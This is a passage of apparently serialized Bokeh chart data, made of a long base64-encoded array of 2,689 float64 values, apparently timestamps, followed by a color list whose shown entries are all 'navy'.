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\",\"dtype\":\"float64\",\"shape\":[2689]},\"color\":[\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\",\"navy\"